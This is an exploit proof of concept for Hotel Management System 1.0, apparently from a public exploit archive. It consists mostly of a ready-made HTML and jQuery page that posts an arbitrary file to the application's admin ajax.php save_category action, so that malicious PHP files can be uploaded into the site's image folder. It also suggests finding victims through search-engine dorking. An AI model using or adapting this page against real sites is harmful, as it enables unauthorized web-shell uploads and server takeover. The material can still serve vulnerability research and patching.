=============================================================================================================================================
| # Title     : Hotel Management System 1.0 Remote File Upload Vulnerability                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload malicious PHP files directly.

[+] Line 23 set url of target.

[+] The path to upload the files : http://127.0.0.1/hotel/assets/img/

[+] Save Code as html :

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Category Management</title>
</head>
<body>
<div class="container-fluid">
    <form id="manage-category" enctype="multipart/form-data">
        <input type="hidden" name="id">           
        <div class="form-group">
            <label for="img" class="control-label">Ev!L Image</label>
            <input type="file" name="img" id="img" class="form-control form-control-sm rounded-0" accept="image/*" onchange="displayImg(this, $(this))">
        </div>
        <button type="submit" class="btn btn-primary">Send</button>
    </form>
</div>
        </tbody>
    </table>
</div>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script>
    function displayImg(input, _this) {
        if (input.files && input.files[0]) {
            var reader = new FileReader();
            reader.onload = function (e) {
                $('#cimg').attr('src', e.target.result);
            }
            reader.readAsDataURL(input.files[0]);
        }
    }

    $('#manage-category').submit(function(e){
        e.preventDefault();
        $.ajax({
            url: 'http://127.0.0.1/hotel/admin/ajax.php?action=save_category',
            data: new FormData($(this)[0]),
            cache: false,
            contentType: false,
            processData: false,
            method: 'POST',
            type: 'POST',
            success: function(resp){
                if (resp == 1) {
                    alert("Data successfully added");
                    setTimeout(function(){
                        location.reload();
                    }, 1500);
       
                }
            }
        });
    });

    $('.edit_cat').click(function(){
        var cat = $('#manage-category');
        cat.get(0).reset();
        $('#cimg').attr('src', '../assets/img/' + $(this).attr('data-cover_img'));
    });

</script>
</body>
</html>


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================